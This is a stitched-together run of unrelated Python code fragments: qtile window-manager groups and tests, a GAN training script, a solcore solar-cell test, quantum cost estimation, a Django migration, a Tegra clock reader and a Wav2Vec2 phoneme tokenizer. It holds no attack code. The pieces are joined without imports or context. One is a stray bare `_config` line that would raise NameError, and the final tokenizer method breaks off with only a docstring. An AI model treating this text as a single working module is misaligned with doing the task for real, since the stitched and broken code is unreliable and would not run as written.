            Group('SYS', layouts=[layout.max(), layout.two_stackWide(), layout.two_stackTall()]),
            Group('CLI', layouts=[layout.two_stackTall(), layout.monadTall(), layout.ten_monadWide()],
                  matches=[Match(title=['Irssi', 'Mpsyt'])]),
            # Editors.
            Group('TYP', layouts=[layout.five_monadTall(), layout.two_stackTall(), layout.two_stackWide()],
                  matches=[Match(wm_class=['Subl3', 'Howl', 'Geany'])]),
            # Virtualization -- floating so guest windows keep their own size.
            Group('VRT', layouts=[layout.floating()],
                  matches=[Match(wm_class=['Xephyr', 'Virt-manager', re.compile('VirtualBox')])]),
            Group('MNG', layouts=[layout.max()], matches=[Match(wm_class=['Nemo'])]),
            Group('AUX', layouts=[layout.max(), layout.ten_monadWide()]),
            # Documents and office suites.
            Group('DOC', layouts=[layout.two_stackTall(), layout.max(), layout.two_stackWide()],
                  matches=[Match(wm_class=['Zathura', 'Evince'])]),
            Group('OFC', layouts=[layout.max(), layout.two_stackWide()],
                  matches=[Match(wm_class=['calibre', re.compile('NetBeans')]),
                           Match(title=[re.compile('LibreOffice')])]),
            # Graphics / media and browsers.
            Group('GPX', layouts=[layout.max(), layout.two_stackWide()],
                  matches=[Match(wm_class=['Glade', 'Inkscape', 'mpv', re.compile('Gimp')])]),
            Group('TCM', layouts=[layout.max(), layout.two_stackTall()],
                  matches=[Match(wm_class=['Tor Browser', 'firefox', 'qutebrowser', 'Chromium', 'Links']),
                           Match(title=['Links'])]),
            # Unnamed scratch group.
            Group('', layouts=[layout.floating()]),
        ]
def create_bottom_up_layers(input_mlp_out: Tensor, num_layers: int, base_num_filters: int, max_num_filters: int, bottom_up_stack: BottomUpStackInterface) -> List[BottomUpLayer]:
    """Build the bottom-up encoder pyramid.

    Layer 0 convolves the input as-is; every subsequent layer downsamples and
    convolves the previous features. The filter count doubles per level,
    capped at ``max_num_filters``. Returns one BottomUpLayer per level.
    """
    filters_out = min(max_num_filters, base_num_filters)
    features = bottom_up_stack.convolve(input_mlp_out, filters_out, 0)
    pyramid = [BottomUpLayer(features, filters_out)]
    for level in range(1, num_layers):
        filters_in = filters_out
        # 2**level growth, clamped to the configured maximum.
        filters_out = min(max_num_filters, (2 ** level) * base_num_filters)
        features = bottom_up_stack.downsample_and_convolve(features, filters_in, filters_out, level)
        pyramid.append(BottomUpLayer(features, filters_out))
    return pyramid
def main():
    """Train the Blending GAN (encoder-decoder generator G vs. critic D) with chainer.

    Parses CLI options, builds the models and optimizers, wires up a
    chainer ``Trainer`` with snapshot/logging/plotting extensions, and runs
    training. Results (snapshots, logs, sample images) go under
    ``--experiment``.
    """
    # --- CLI options -------------------------------------------------------
    parser = argparse.ArgumentParser(description='Train Blending GAN')
    parser.add_argument('--nef', type=int, default=64, help='# of base filters in encoder')
    parser.add_argument('--ngf', type=int, default=64, help='# of base filters in decoder')
    parser.add_argument('--nc', type=int, default=3, help='# of output channels in decoder')
    parser.add_argument('--nBottleneck', type=int, default=4000, help='# of output channels in encoder')
    parser.add_argument('--ndf', type=int, default=64, help='# of base filters in D')
    parser.add_argument('--lr_d', type=float, default=0.0002, help='Learning rate for Critic, default=0.0002')
    parser.add_argument('--lr_g', type=float, default=0.002, help='Learning rate for Generator, default=0.002')
    parser.add_argument('--beta1', type=float, default=0.5, help='Beta for Adam, default=0.5')
    parser.add_argument('--l2_weight', type=float, default=0.999, help='Weight for l2 loss, default=0.999')
    parser.add_argument('--gpu', type=int, default=0, help='GPU ID (negative value indicates CPU)')
    parser.add_argument('--n_epoch', type=int, default=25, help='# of epochs to train for')
    parser.add_argument('--data_root', help='Path to dataset')
    parser.add_argument('--load_size', type=int, default=64, help='Scale image to load_size')
    parser.add_argument('--image_size', type=int, default=64, help='The height / width of the input image to network')
    parser.add_argument('--ratio', type=float, default=0.5, help='Ratio for center square size v.s. image_size')
    parser.add_argument('--val_ratio', type=float, default=0.05, help='Ratio for validation set v.s. data set')
    parser.add_argument('--d_iters', type=int, default=5, help='# of D iters per each G iter')
    parser.add_argument('--clamp_lower', type=float, default=(- 0.01), help='Lower bound for clipping')
    parser.add_argument('--clamp_upper', type=float, default=0.01, help='Upper bound for clipping')
    parser.add_argument('--experiment', default='encoder_decoder_blending_result', help='Where to store samples and models')
    parser.add_argument('--test_folder', default='samples', help='Where to store test results')
    parser.add_argument('--workers', type=int, default=4, help='# of data loading workers')
    parser.add_argument('--batch_size', type=int, default=64, help='Input batch size')
    parser.add_argument('--test_size', type=int, default=64, help='Batch size for testing')
    parser.add_argument('--train_samples', type=int, default=150000, help='# of training examples')
    parser.add_argument('--test_samples', type=int, default=256, help='# of testing examples')
    parser.add_argument('--manual_seed', type=int, default=5, help='Manul seed')
    parser.add_argument('--resume', default='', help='Resume the training from snapshot')
    parser.add_argument('--snapshot_interval', type=int, default=1, help='Interval of snapshot (epochs)')
    parser.add_argument('--print_interval', type=int, default=1, help='Interval of printing log to console (iteration)')
    parser.add_argument('--plot_interval', type=int, default=10, help='Interval of plot (iteration)')
    args = parser.parse_args()
    random.seed(args.manual_seed)
    print('Input arguments:')
    for (key, value) in vars(args).items():
        print('\t{}: {}'.format(key, value))
    print('')
    # --- Models ------------------------------------------------------------
    print('Create & Init models ...')
    print('\tInit G network ...')
    G = EncoderDecoder(args.nef, args.ngf, args.nc, args.nBottleneck, image_size=args.image_size, conv_init=init_conv, bn_init=init_bn)
    print('\tInit D network ...')
    D = DCGAN_D(args.image_size, args.ndf, conv_init=init_conv, bn_init=init_bn)
    if (args.gpu >= 0):
        print('\tCopy models to gpu {} ...'.format(args.gpu))
        chainer.cuda.get_device(args.gpu).use()
        G.to_gpu()
        D.to_gpu()
    print('Init models done ...\n')
    optimizer_d = make_optimizer(D, args.lr_d, args.beta1)
    optimizer_g = make_optimizer(G, args.lr_g, args.beta1)
    # --- Datasets: split folders into train/val by --val_ratio -------------
    print('Load images from {} ...'.format(args.data_root))
    folders = sorted([folder for folder in os.listdir(args.data_root) if os.path.isdir(os.path.join(args.data_root, folder))])
    val_end = int((args.val_ratio * len(folders)))
    print('\t{} folders in total, {} val folders ...'.format(len(folders), val_end))
    trainset = BlendingDataset(args.train_samples, folders[val_end:], args.data_root, args.ratio, args.load_size, args.image_size)
    valset = BlendingDataset(args.test_samples, folders[:val_end], args.data_root, args.ratio, args.load_size, args.image_size)
    print('\tTrainset contains {} image files'.format(len(trainset)))
    print('\tValset contains {} image files'.format(len(valset)))
    print('')
    # --- Trainer + extensions ----------------------------------------------
    train_iter = chainer.iterators.MultiprocessIterator(trainset, args.batch_size, n_processes=args.workers, n_prefetch=args.workers)
    updater = EncoderDecoderBlendingUpdater(models=(G, D), args=args, iterator=train_iter, optimizer={'main': optimizer_g, 'D': optimizer_d}, device=args.gpu)
    trainer = training.Trainer(updater, (args.n_epoch, 'epoch'), out=args.experiment)
    snapshot_interval = (args.snapshot_interval, 'epoch')
    trainer.extend(extensions.snapshot(filename='snapshot_epoch_{.updater.epoch}.npz'), trigger=snapshot_interval)
    trainer.extend(extensions.snapshot_object(G, 'g_epoch_{.updater.epoch}.npz'), trigger=snapshot_interval)
    trainer.extend(extensions.snapshot_object(D, 'd_epoch_{.updater.epoch}.npz'), trigger=snapshot_interval)
    print_interval = (args.print_interval, 'iteration')
    trainer.extend(extensions.LogReport(trigger=print_interval))
    trainer.extend(extensions.PrintReport(['iteration', 'main/loss', 'D/loss', 'main/l2_loss']), trigger=print_interval)
    trainer.extend(extensions.ProgressBar(update_interval=args.print_interval))
    trainer.extend(extensions.dump_graph('D/loss', out_name='TrainGraph.dot'))
    plot_interval = (args.plot_interval, 'iteration')
    trainer.extend(extensions.PlotReport(['main/loss'], 'iteration', file_name='loss.png', trigger=plot_interval))
    trainer.extend(extensions.PlotReport(['D/loss'], 'iteration', file_name='d_loss.png', trigger=plot_interval))
    trainer.extend(extensions.PlotReport(['main/l2_loss'], 'iteration', file_name='l2_loss.png', trigger=plot_interval))
    # --- Periodic sample dumps for train and val batches -------------------
    path = os.path.join(args.experiment, args.test_folder)
    if (not os.path.isdir(path)):
        os.makedirs(path)
    print('Saving samples to {} ...\n'.format(path))
    train_batch = [trainset[idx][0] for idx in range(args.test_size)]
    train_v = Variable(chainer.dataset.concat_examples(train_batch, args.gpu))
    trainer.extend(sampler(G, path, train_v, 'fake_samples_train_{}.png'), trigger=plot_interval)
    val_batch = [valset[idx][0] for idx in range(args.test_size)]
    val_v = Variable(chainer.dataset.concat_examples(val_batch, args.gpu))
    trainer.extend(sampler(G, path, val_v, 'fake_samples_val_{}.png'), trigger=plot_interval)
    # --- Optionally resume, then run ---------------------------------------
    if args.resume:
        print('Resume from {} ... \n'.format(args.resume))
        chainer.serializers.load_npz(args.resume, trainer)
    print('Training start ...\n')
    trainer.run()
def test_compare_DA_pn():
    """Cross-check the analytic depletion-approximation IV solver against the
    Sesame drift-diffusion solver on the same GaAs p-n junction.

    The two models should roughly agree at short circuit (5% tolerance) and
    have the same sign of current at the last voltage point.
    """
    from solcore import material, si
    from solcore.structure import Junction, Layer
    from solcore.solar_cell_solver import solar_cell_solver, SolarCell
    from solcore.analytic_solar_cells import iv_depletion
    from solcore.sesame_drift_diffusion.solve_pdd import iv_sesame
    from solcore.sesame_drift_diffusion.process_structure import carrier_constants
    from solcore.state import State
    from solcore.light_source import LightSource
    # p-emitter / n-base GaAs with matching minority-carrier lifetimes.
    GaAs_p = material('GaAs')(T=300, Na=1e+24, hole_minority_lifetime=1e-06, electron_minority_lifetime=1e-06)
    GaAs_n = material('GaAs')(T=300, Nd=1e+24, hole_minority_lifetime=1e-06, electron_minority_lifetime=1e-06)
    GaAs_p.electron_diffusion_length = carrier_constants('electron_diffusion_length', GaAs_p)
    GaAs_n.hole_diffusion_length = carrier_constants('hole_diffusion_length', GaAs_n)
    # Common solver options (light IV under AM1.5g, TMM optics).
    options = State()
    options.wavelength = (np.linspace(300, 950, 100) * 1e-09)
    options.voltages = np.linspace((- 0.5), 1.3, 30)
    options.internal_voltages = np.linspace((- 0.5), 1.3, 30)
    options.T = 300
    options.light_iv = True
    options.light_source = LightSource(source_type='standard', version='AM1.5g', x=options.wavelength, output_units='photon_flux_per_m')
    options.da_mode = 'green'
    options.optics_method = 'TMM'
    mesh = (np.linspace(0, 2200, 500) * 1e-09)
    pn_junction = Junction([Layer(si('200nm'), GaAs_p, role='emitter'), Layer(si('2000nm'), GaAs_n, role='base')], kind='DA', R_shunt=0.1, mesh=mesh)
    solar_cell_solver(SolarCell([pn_junction]), 'optics', options)
    # Solve with the depletion approximation first; it attaches `current`
    # and an interpolator `iv` to the junction.
    iv_depletion(pn_junction, options)
    depletion_current = pn_junction.current
    depletion_current_interp = pn_junction.iv(options.voltages)
    # Then solve the same junction with Sesame (overwrites the attributes).
    iv_sesame(pn_junction, options)
    sesame_current = pn_junction.current
    sesame_current_interp = pn_junction.iv(options.voltages)
    assert (depletion_current[0] == approx(sesame_current[0], rel=0.05))
    assert (np.sign(depletion_current[(- 1)]) == np.sign(sesame_current[(- 1)]))
    assert (depletion_current_interp[0] == approx(sesame_current_interp[0], rel=0.05))
    assert (np.sign(depletion_current_interp[(- 1)]) == np.sign(sesame_current_interp[(- 1)]))
    # internal_voltages == voltages here, so interpolation is a no-op.
    assert np.all((sesame_current == sesame_current_interp))
def compute_cost(num_spin_orbs: int, lambda_tot: float, num_sym_unique: int, kmesh: list[int], dE_for_qpe: float=0.0016, chi: int=10) -> ResourceEstimates:
    """Estimate quantum resources for phase estimation with these Hamiltonian
    parameters.

    Runs the cost model twice: a first pass with a placeholder step count
    (20000) to learn the true number of algorithm steps, then a second pass
    with that converged count to produce the final Toffoli/qubit estimates.
    """
    (num_steps, *_rest) = _compute_cost(num_spin_orbs, lambda_tot, num_sym_unique, dE_for_qpe, chi, 20000, *kmesh)
    (per_step, total, qubits) = _compute_cost(num_spin_orbs, lambda_tot, num_sym_unique, dE_for_qpe, chi, num_steps, *kmesh)[:3]
    return ResourceEstimates(toffolis_per_step=per_step, total_toffolis=total, logical_qubits=qubits)
def test_none_crown_at_list_crown(debug_ctx, debug_trail, acc_schema):
    """A list crown mixes none-crowns (constant placeholders) with one real
    field crown; the dumper must emit each element in declared order."""
    crown = OutListCrown([
        OutNoneCrown(placeholder=DefaultValue(None)),
        OutNoneCrown(placeholder=DefaultValue(SomeClass(2))),
        OutFieldCrown('a'),
        OutNoneCrown(placeholder=DefaultFactory(list)),
    ])
    dumper_getter = make_dumper_getter(
        shape=shape(TestField('a', acc_schema.accessor_maker('a', True))),
        name_layout=OutputNameLayout(crown=crown, extra_move=None),
        debug_trail=debug_trail,
        debug_ctx=debug_ctx,
    )
    assert dumper_getter()(acc_schema.dummy(a=1)) == [None, SomeClass(2), 1, []]
def postprocess_args(args):
    """Derive all dataset/feature/output paths from the parsed CLI namespace.

    Mutates ``args`` in place (and returns it): fills in feature-file,
    connectivity, scan-data, annotation and output sub-directory paths, and
    creates the output directories. ``args.langs`` is only meaningful for the
    RxR dataset and is dropped otherwise.
    """
    root_dir = args.root_dir
    # Short feature name -> actual pre-extracted feature file under R2R/features.
    ft_file_map = {'vitbase': 'pth_vit_base_patch16_224_imagenet.hdf5', 'vitbase_r2rfte2e': 'pth_vit_base_patch16_224_imagenet_r2r.e2e.ft.22k.hdf5', 'vitbase_clip': 'pth_vit_base_patch32_224_clip.hdf5', 'clip16': 'CLIP-ViT-B-16-views.tsv'}
    args.img_ft_file = os.path.join(root_dir, 'R2R', 'features', ft_file_map[args.features])
    args.connectivity_dir = os.path.join(root_dir, 'R2R', 'connectivity')
    args.scan_data_dir = os.path.join(root_dir, 'Matterport3D', 'v1_unzip_scans')
    # Annotations live under RxR or R2R depending on the target dataset.
    anno_root = 'RxR' if args.dataset == 'rxr' else 'R2R'
    args.anno_dir = os.path.join(root_dir, anno_root, 'annotations')
    args.ckpt_dir = os.path.join(args.output_dir, 'ckpts')
    args.log_dir = os.path.join(args.output_dir, 'logs')
    args.pred_dir = os.path.join(args.output_dir, 'preds')
    for out_dir in (args.output_dir, args.ckpt_dir, args.log_dir, args.pred_dir):
        os.makedirs(out_dir, exist_ok=True)
    # Guard with hasattr: previously `del args.langs` raised AttributeError
    # when the option was never defined for the chosen dataset config.
    if args.dataset != 'rxr' and hasattr(args, 'langs'):
        del args.langs
    return args
def l2_lgr_schema(settings=None):
    """Build the schema dict describing the L2 LGR product.

    ``settings`` may override ``num_groups`` (default 120), ``providers``
    and ``variable_path``. Each variable's ``default_data`` is a zero-arg
    callable producing a synthetic coordinate array.
    """
    opts = settings if settings else {}
    n_groups = opts.get('num_groups', 120)

    def _default_lat():
        return np.linspace(-90, 90, n_groups)

    def _default_lon():
        # NOTE: upper bound of 80 (not 180) preserved from the original.
        return np.linspace(-180, 80, n_groups)

    variables = {
        'latitude': {
            'format': 'f4',
            'shape': ('groups',),
            'long_name': 'Latitude of group',
            'units': 'degrees_north',
            'default_data': _default_lat,
        },
        'longitude': {
            'format': 'f4',
            'shape': ('groups',),
            'long_name': 'Longitude of group',
            'units': 'degrees_east',
            'default_data': _default_lon,
        },
    }
    return {
        'providers': opts.get('providers', {}),
        'variable_path': opts.get('variable_path', ''),
        'dimensions': {'groups': n_groups},
        'variables': variables,
    }
def _read_khz(file_path):
    """Return the integer in ``file_path`` converted Hz -> kHz, or None if unreadable."""
    if os.access(file_path, os.R_OK):
        with open(file_path, 'r') as f:
            return int(f.read()) // 1000
    return None


def read_emc(root_path):
    """Read EMC (external memory controller) clock info from debugfs/sysfs.

    Probes three board generations in order: the BPMP debugfs node, the
    tegra_bwmgr node, and the legacy ``clk/emc`` engine node. Returns a dict
    with any of the keys ``cur``/``max``/``min``/``override`` (in kHz) that
    could be read; missing files simply leave their key out.
    """
    emc = {}
    bpmp = root_path + '/debug/bpmp/debug/clk/emc'
    if os.path.isdir(bpmp):
        # Newer boards: all rates live under the BPMP clock node.
        for key, name in (('cur', 'rate'), ('max', 'max_rate'), ('min', 'min_rate'), ('override', 'mrq_rate_locked')):
            value = _read_khz(bpmp + '/' + name)
            if value is not None:
                emc[key] = value
    elif os.path.isdir(root_path + '/debug/tegra_bwmgr'):
        # Bandwidth-manager boards: current/override under the clk override
        # node, min/max under tegra_bwmgr.
        # NOTE(review): clk_state is divided by 1000 like the rates — looks
        # suspicious (a state flag, not a frequency) but preserved as-is.
        override_node = root_path + '/debug/clk/override.emc'
        for key, name in (('cur', 'clk_rate'), ('override', 'clk_state')):
            value = _read_khz(override_node + '/' + name)
            if value is not None:
                emc[key] = value
        bwmgr = root_path + '/tegra_bwmgr'
        for key, name in (('max', 'emc_max_rate'), ('min', 'emc_min_rate')):
            value = _read_khz(bwmgr + '/' + name)
            if value is not None:
                emc[key] = value
    elif os.path.isdir(root_path + '/clk/emc'):
        # Legacy layout: delegate to the generic engine reader.
        emc = read_engine(root_path + '/clk/emc')
    # nvpmodel may cap the ISO bandwidth below the hardware maximum.
    emc_cap = _read_khz(root_path + '/nvpmodel_emc_cap/emc_iso_cap')
    if emc_cap is None:
        emc_cap = 0
    if 'max' in emc and 0 < emc_cap < emc['max']:
        emc['max'] = emc_cap
    return emc
# NOTE(review): this bare `_config` expression looks like a truncated
# decorator (e.g. `@<something>_config` selecting a qtile test config for
# the `manager` fixture) — TODO: recover the original decorator. As written
# it is a no-op name lookup that raises NameError unless `_config` is
# defined earlier in the file.
_config
def test_select_group(manager):
    """Exercise command-graph navigation from a group node: layout, window,
    and screen selection, including the error paths for bad selectors."""
    group = manager.c.group
    assert (group.layout.info()['group'] == 'a')
    assert (len(group.layout.info()['stacks']) == 1)
    assert (len(group.layout[2].info()['stacks']) == 3)
    # No window exists yet, so window.info() must fail.
    with pytest.raises(CommandError):
        manager.c.group.window.info()
    manager.test_window('test')
    wid = manager.c.window.info()['id']
    # Both the bare node and the id-selected node resolve to the new window.
    assert (group.window.info()['id'] == wid)
    assert (group.window[wid].info()['id'] == wid)
    with pytest.raises(libqtile.command.client.SelectError, match='Item not available in object'):
        group.window['foo']
    assert (group.screen.info()['index'] == 0)
    assert (group['b'].screen.info()['index'] == 1)
    # Screens are not selectable by index from a group node.
    with pytest.raises(libqtile.command.client.SelectError, match='Item not available in object'):
        group.screen[0]
class Migration(migrations.Migration):
    """Introduce proxy models DefaultAccount (over accounts.accountdb) and
    DefaultGuest (over DefaultAccount), and set AccountDB's verbose name.

    Proxy models add no tables, so this migration is schema-free.
    """
    dependencies = [('accounts', '0002_move_defaults')]
    operations = [migrations.CreateModel(name='DefaultAccount', fields=[], options={'proxy': True}, bases=('accounts.accountdb',)), migrations.CreateModel(name='DefaultGuest', fields=[], options={'proxy': True}, bases=('accounts.defaultaccount',)), migrations.AlterModelOptions(name='accountdb', options={'verbose_name': 'Account'})]
def testActiveComps(run_cli, backends):
    """With --active-components, the retired 'virtinst' component must be
    filtered out of both the component list and the owners list."""
    bz = _open_bz(REDHAT_URL, **backends)
    out = run_cli("bugzilla info --components 'Virtualization Tools' --active-components", bz)
    assert ('virtinst' not in out)
    out = run_cli("bugzilla info --component_owners 'Virtualization Tools' --active-components", bz)
    assert ('virtinst' not in out)
def gen_seq_masks(seq_lens, max_len=None):
    """Build a boolean padding mask of shape (batch, max_len).

    Entry (b, t) is True iff t < seq_lens[b]. When ``max_len`` is omitted it
    defaults to the longest sequence in the batch. The mask is created on the
    same device as ``seq_lens``.
    """
    if max_len is None:
        max_len = max(seq_lens)
    positions = torch.arange(max_len).unsqueeze(0).repeat(len(seq_lens), 1).to(seq_lens.device)
    return positions < seq_lens.unsqueeze(1)
class Wav2Vec2PhonemeCTCTokenizer(PreTrainedTokenizer):
    """CTC tokenizer that converts text into phoneme tokens via the
    `phonemizer` library, and decodes CTC output (with repeat-grouping and
    delimiter filtering) back into a phoneme string.

    Fixes applied: the `@property` / `@<name>.setter` / `@staticmethod`
    decorators were missing (the bare `_delimiter_token.setter` lines raised
    NameError at class-creation time), and the `word_delimiter_token`
    property now logs when unset, consistent with `phone_delimiter_token`.
    """

    vocab_files_names = VOCAB_FILES_NAMES
    pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
    max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
    model_input_names = ['input_ids', 'attention_mask']

    def __init__(self, vocab_file, bos_token='<s>', eos_token='</s>', unk_token='<unk>', pad_token='<pad>', phone_delimiter_token=' ', word_delimiter_token=None, do_phonemize=True, phonemizer_lang='en-us', phonemizer_backend='espeak', **kwargs):
        super().__init__(unk_token=unk_token, bos_token=bos_token, eos_token=eos_token, pad_token=pad_token, word_delimiter_token=word_delimiter_token, phone_delimiter_token=phone_delimiter_token, do_phonemize=do_phonemize, phonemizer_lang=phonemizer_lang, phonemizer_backend=phonemizer_backend, **kwargs)
        self._word_delimiter_token = word_delimiter_token
        self._phone_delimiter_token = phone_delimiter_token
        self.do_phonemize = do_phonemize
        self.phonemizer_lang = phonemizer_lang
        self.phonemizer_backend = phonemizer_backend
        # The phonemizer backend is only needed when we actually phonemize.
        if do_phonemize:
            self.init_backend(self.phonemizer_lang)
        with open(vocab_file, encoding='utf-8') as vocab_handle:
            self.encoder = json.load(vocab_handle)
        self.decoder = {v: k for (k, v) in self.encoder.items()}

    @property
    def vocab_size(self) -> int:
        """Size of the base vocabulary (without added tokens)."""
        return len(self.decoder)

    def get_vocab(self) -> Dict:
        """Return token -> id mapping including added tokens."""
        return dict(self.encoder, **self.added_tokens_encoder)

    def init_backend(self, phonemizer_lang: str):
        """Instantiate the phonemizer backend for `phonemizer_lang`."""
        requires_backends(self, 'phonemizer')
        from phonemizer.backend import BACKENDS
        self.backend = BACKENDS[self.phonemizer_backend](phonemizer_lang, language_switch='remove-flags')

    def prepare_for_tokenization(self, text: str, is_split_into_words: bool=False, phonemizer_lang: Optional[str]=None, do_phonemize: Optional[bool]=None) -> Tuple[(str, Dict[(str, Any)])]:
        """Optionally switch phonemization language/mode before tokenizing.

        Note: a non-None `phonemizer_lang`/`do_phonemize` persistently updates
        the tokenizer state, not just this call.
        """
        if is_split_into_words:
            text = (' ' + text)
        if (do_phonemize is not None):
            self.do_phonemize = do_phonemize
        if (phonemizer_lang is not None):
            self.phonemizer_lang = phonemizer_lang
            self.init_backend(phonemizer_lang)
        return (text, {})

    def _tokenize(self, text, **kwargs):
        """Phonemize (if enabled) then split on single spaces, dropping empties."""
        text = text.strip()
        if self.do_phonemize:
            text = text.lower()
            text = self.phonemize(text, self.phonemizer_lang)
        tokens = text.split(' ')
        tokens = list(filter((lambda p: (p.strip() != '')), tokens))
        return tokens

    def phonemize(self, text: str, phonemizer_lang: Optional[str]=None) -> str:
        """Convert `text` into a phone-delimited phoneme string."""
        from phonemizer.separator import Separator
        word_delimiter = ((self.word_delimiter_token + ' ') if (self.word_delimiter_token is not None) else '')
        if ((phonemizer_lang is not None) and (phonemizer_lang != self.phonemizer_lang)):
            self.init_backend(phonemizer_lang)
        else:
            phonemizer_lang = self.phonemizer_lang
        separator = Separator(phone=self.phone_delimiter_token, word=word_delimiter, syllable='')
        phonemes = self.backend.phonemize([text], separator=separator)
        phonemes = phonemes[0].strip()
        return phonemes

    @property
    def word_delimiter_token(self) -> str:
        """The word-boundary token, or None (with a log message) if unset."""
        if ((self._word_delimiter_token is None) and self.verbose):
            # Consistency fix: mirror the phone_delimiter_token property.
            logger.error('Using word_delimiter_token, but it is not set yet.')
            return None
        return str(self._word_delimiter_token)

    @property
    def word_delimiter_token_id(self) -> Optional[int]:
        """Id of the word-boundary token, or None if unset."""
        if (self._word_delimiter_token is None):
            return None
        return self.convert_tokens_to_ids(self.word_delimiter_token)

    @word_delimiter_token.setter
    def word_delimiter_token(self, value):
        self._word_delimiter_token = value

    @word_delimiter_token_id.setter
    def word_delimiter_token_id(self, value):
        self._word_delimiter_token = self.convert_tokens_to_ids(value)

    @property
    def phone_delimiter_token(self) -> str:
        """The phone-separator token, or None (with a log message) if unset."""
        if ((self._phone_delimiter_token is None) and self.verbose):
            logger.error('Using phone_delimiter_token, but it is not set yet.')
            return None
        return str(self._phone_delimiter_token)

    @property
    def phone_delimiter_token_id(self) -> Optional[int]:
        """Id of the phone-separator token, or None if unset."""
        if (self._phone_delimiter_token is None):
            return None
        return self.convert_tokens_to_ids(self.phone_delimiter_token)

    @phone_delimiter_token.setter
    def phone_delimiter_token(self, value):
        self._phone_delimiter_token = value

    @phone_delimiter_token_id.setter
    def phone_delimiter_token_id(self, value):
        self._phone_delimiter_token = self.convert_tokens_to_ids(value)

    def _convert_token_to_id(self, token: str) -> int:
        """Map a token to its id, falling back to the unk id."""
        return self.encoder.get(token, self.encoder.get(self.unk_token))

    def _convert_id_to_token(self, index: int) -> str:
        """Map an id back to its token, falling back to the unk token."""
        result = self.decoder.get(index, self.unk_token)
        return result

    def convert_tokens_to_string(self, tokens: List[str], group_tokens: bool=True, spaces_between_special_tokens: bool=False, filter_word_delimiter_token: bool=True, output_char_offsets: bool=False) -> str:
        """CTC-style collapse: group repeats, drop pad/word-delimiter tokens,
        join with spaces; optionally compute per-char offsets.

        Returns a dict with 'text' and 'char_offsets' (despite the `-> str`
        annotation, kept for interface compatibility).
        """
        if group_tokens:
            # Collapse runs of identical tokens, remembering run lengths for offsets.
            (chars, char_repetitions) = zip(*((token, len(list(group_iter))) for (token, group_iter) in groupby(tokens)))
        else:
            chars = tokens
            char_repetitions = (len(tokens) * [1])
        processed_chars = list(filter((lambda char: (char != self.pad_token)), chars))
        if (filter_word_delimiter_token and (self.word_delimiter_token is not None)):
            processed_chars = list(filter((lambda token: (token != self.word_delimiter_token)), processed_chars))
        char_offsets = None
        if output_char_offsets:
            word_delimiter_token_for_offsets = (self.word_delimiter_token if (filter_word_delimiter_token is True) else None)
            char_offsets = self._compute_offsets(char_repetitions, chars, self.pad_token, word_delimiter_token=word_delimiter_token_for_offsets)
            if (len(char_offsets) != len(processed_chars)):
                raise ValueError(f'`char_offsets`: {char_offsets} and `processed_tokens`: {processed_chars} have to be of the same length, but are: `len(offsets)`: {len(char_offsets)} and `len(processed_tokens)`: {len(processed_chars)}')
            for (i, char) in enumerate(processed_chars):
                char_offsets[i]['char'] = char
        string = ' '.join(processed_chars).strip()
        return {'text': string, 'char_offsets': char_offsets}

    @staticmethod
    def _compute_offsets(char_repetitions: List[int], chars: List[str], ctc_token: int, word_delimiter_token: Optional[int]=None) -> List[Dict[(str, Union[(str, int)])]]:
        """Turn run lengths into [start, end) offsets, dropping ctc/pad and
        (optionally) word-delimiter entries.

        Made a @staticmethod: the signature has no `self` and the caller
        invokes it as `self._compute_offsets(...)`.
        """
        end_indices = np.asarray(char_repetitions).cumsum()
        start_indices = np.concatenate(([0], end_indices[:(- 1)]))
        offsets = [{'char': t, 'start_offset': s, 'end_offset': e} for (t, s, e) in zip(chars, start_indices, end_indices)]
        offsets = list(filter((lambda offsets: (offsets['char'] != ctc_token)), offsets))
        if (word_delimiter_token is not None):
            offsets = list(filter((lambda offsets: (offsets['char'] != word_delimiter_token)), offsets))
        return offsets

    def _decode(self, token_ids: List[int], skip_special_tokens: bool=False, clean_up_tokenization_spaces: bool=True, group_tokens: bool=True, filter_word_delimiter_token: bool=True, spaces_between_special_tokens: bool=False, output_char_offsets: bool=False) -> str:
        """Decode ids to a phoneme string (plus offsets when requested)."""
        filtered_tokens = self.convert_ids_to_tokens(token_ids, skip_special_tokens=skip_special_tokens)
        result = []
        for token in filtered_tokens:
            if (skip_special_tokens and (token in self.all_special_ids)):
                continue
            result.append(token)
        string_output = self.convert_tokens_to_string(result, group_tokens=group_tokens, spaces_between_special_tokens=spaces_between_special_tokens, filter_word_delimiter_token=filter_word_delimiter_token, output_char_offsets=output_char_offsets)
        text = string_output['text']
        if clean_up_tokenization_spaces:
            text = self.clean_up_tokenization(text)
        if output_char_offsets:
            return Wav2Vec2PhonemeCTCTokenizerOutput(text=text, char_offsets=string_output['char_offsets'])
        else:
            return text

    def decode(self, token_ids: Union[(int, List[int], 'np.ndarray', 'torch.Tensor', 'tf.Tensor')], skip_special_tokens: bool=False, clean_up_tokenization_spaces: bool=True, output_char_offsets: bool=False, **kwargs) -> str:
        """Public decode entry point; normalizes framework tensors first."""
        token_ids = to_py_obj(token_ids)
        return self._decode(token_ids=token_ids, skip_special_tokens=skip_special_tokens, clean_up_tokenization_spaces=clean_up_tokenization_spaces, output_char_offsets=output_char_offsets, **kwargs)

    def batch_decode(self, sequences: Union[(List[int], List[List[int]], 'np.ndarray', 'torch.Tensor', 'tf.Tensor')], skip_special_tokens: bool=False, clean_up_tokenization_spaces: bool=True, output_char_offsets: bool=False, **kwargs) -> List[str]:
        """Decode a batch; when offsets are requested, transpose the per-item
        outputs into one output object of lists."""
        batch_decoded = [self.decode(seq, skip_special_tokens=skip_special_tokens, clean_up_tokenization_spaces=clean_up_tokenization_spaces, output_char_offsets=output_char_offsets, **kwargs) for seq in sequences]
        if output_char_offsets:
            return Wav2Vec2PhonemeCTCTokenizerOutput({k: [d[k] for d in batch_decoded] for k in batch_decoded[0]})
        return batch_decoded

    def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str]=None) -> Tuple[str]:
        """Write the encoder as a JSON vocab file into `save_directory`."""
        if (not os.path.isdir(save_directory)):
            logger.error(f'Vocabulary path ({save_directory}) should be a directory')
            return
        vocab_file = os.path.join(save_directory, (((filename_prefix + '-') if filename_prefix else '') + VOCAB_FILES_NAMES['vocab_file']))
        with open(vocab_file, 'w', encoding='utf-8') as f:
            f.write((json.dumps(self.encoder, indent=2, sort_keys=True, ensure_ascii=False) + '\n'))
        return (vocab_file,)

    def _add_tokens(self, new_tokens: Union[(List[str], List[AddedToken])], special_tokens: bool=False) -> int:
        """Add tokens not already in the vocab; multi-char tokens are also
        registered as no-split special tokens. Returns the number added."""
